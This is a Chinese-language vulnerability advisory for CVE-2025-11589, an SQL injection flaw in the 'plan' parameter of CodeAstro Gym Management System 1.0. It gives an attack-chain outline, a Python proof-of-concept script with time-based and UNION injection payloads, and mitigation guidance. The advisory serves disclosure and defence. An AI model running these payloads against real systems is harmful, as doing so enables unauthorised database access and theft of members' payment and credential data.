CVE-2025-11589：CodeAstro健身房管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11589

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Gym Management System

漏洞概述

CVE-2025-11589是CodeAstro Gym Management System 1.0版本中存在的SQL注入安全漏洞。该漏洞位于/admin/user-payment.php文件中，具体涉及对参数`plan`的操纵处理不当。攻击者可以通过远程方式发起攻击，利用该漏洞对数据库执行未授权的SQL查询操作。根据CVSS 3.1评分体系，该漏洞评分为6.3分，属于中危级别。攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），仅需要低权限认证（PR:L），无需用户交互（UI:N）。漏洞对机密性、完整性和可用性均产生低级别影响。该漏洞的利用代码已公开发布，可能被恶意攻击者用于实际攻击活动。CodeAstro Gym Management System是一款面向健身房管理的Web应用程序，用于管理会员、支付、课程安排等业务功能。由于该系统涉及用户支付信息，SQL注入漏洞可能导致敏感的用户财务数据泄露，对用户隐私和系统安全构成威胁。

技术细节

该漏洞的核心问题在于/admin/user-payment.php文件对用户输入的`plan`参数缺乏充分的过滤和参数化处理。当系统接收来自用户的`plan`参数时，未使用预编译语句（Prepared Statements）或存储过程，而是直接将用户输入拼接到SQL查询语句中执行，从而形成了经典的SQL注入漏洞。攻击者可以通过构造特殊的SQL语句作为`plan`参数的值，绕过应用层的输入验证，注入恶意的SQL代码片段。攻击者可以利用该漏洞执行以下操作：1）使用UNION SELECT语句提取数据库中的敏感信息，如管理员凭据、用户支付记录等；2）利用布尔盲注或时间盲注技术逐步推断数据库结构和内容；3）通过堆叠查询（Stacked Queries）执行INSERT、UPDATE或DELETE操作，篡改或删除数据库中的数据；4）在特定数据库配置下，利用SQL注入读取服务器文件或执行系统命令。由于该漏洞需要低权限认证（PR:L），攻击者需要首先获取一个普通用户账号才能利用此漏洞，这降低了漏洞被大规模利用的风险，但仍然对系统安全构成实质性威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或Shodan等工具识别目标网站是否使用CodeAstro Gym Management System 1.0版本，并定位/admin/user-payment.php端点。

STEP 2

步骤2：获取认证凭据

攻击者通过暴力破解、钓鱼攻击或购买泄露的数据库等方式获取系统的低权限账号（PR:L），完成登录认证。

STEP 3

步骤3：构造SQL注入Payload

攻击者针对/admin/user-payment.php的`plan`参数构造恶意SQL注入payload，可使用UNION注入、布尔盲注或时间盲注等技术。

STEP 4

步骤4：发送恶意请求

攻击者通过认证后的会话发送包含恶意SQL注入payload的HTTP请求到/admin/user-payment.php端点。

STEP 5

步骤5：数据提取与利用

成功利用后，攻击者可提取数据库中的敏感信息（如用户支付记录、管理员凭据），或进一步篡改、删除数据库内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11589 - CodeAstro Gym Management System SQL Injection PoC
# Vulnerable file: /admin/user-payment.php
# Vulnerable parameter: plan

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
LOGIN_URL = f"{TARGET_URL}/admin/login.php"
VULNERABLE_URL = f"{TARGET_URL}/admin/user-payment.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Create session to maintain cookies
session = requests.Session()

# Step 1: Login to obtain low-privilege authenticated session
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Exploit SQL injection via 'plan' parameter
# Time-based blind SQL injection payload
sql_payload = "1' AND SLEEP(5)-- -"

# Alternatively, UNION-based injection to extract data
union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"

params = {
    "plan": sql_payload
}

# Step 3: Send the malicious request
response = session.get(VULNERABLE_URL, params=params)

if response.status_code == 200:
    print(f"[+] Response received (length: {len(response.text)})")
    print(f"[+] Check response for data extraction")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Step 4: Extract database information using UNION injection
extraction_params = {
    "plan": "1' UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10-- -"
}
response = session.get(VULNERABLE_URL, params=extraction_params)
print(f"[+] Database info: {response.text}")

影响范围

CodeAstro Gym Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对/admin/user-payment.php文件中的`plan`参数进行紧急修复，使用mysqli_prepare或PDO预编译语句替代直接拼接SQL的方式；2）在Web服务器层面部署WAF规则，过滤常见的SQL注入关键字（如UNION、SELECT、SLEEP等）；3）限制/admin目录的访问权限，仅允许特定IP地址访问管理后台；4）监控数据库日志，对异常的慢查询或错误查询进行告警；5）重置所有管理员账号密码，防止攻击者利用已泄露的凭据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11589
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11589
3 Details https://www.cvedetails.com/cve/CVE-2025-11589/
4 VulDB https://vuldb.com/cve/CVE-2025-11589
5 Link https://codeastro.com/
6 Link https://github.com/coppeliaz/cve/issues/2
7 Link https://vuldb.com/?ctiid.327910
8 Link https://vuldb.com/?id.327910
9 Link https://vuldb.com/?submit.671736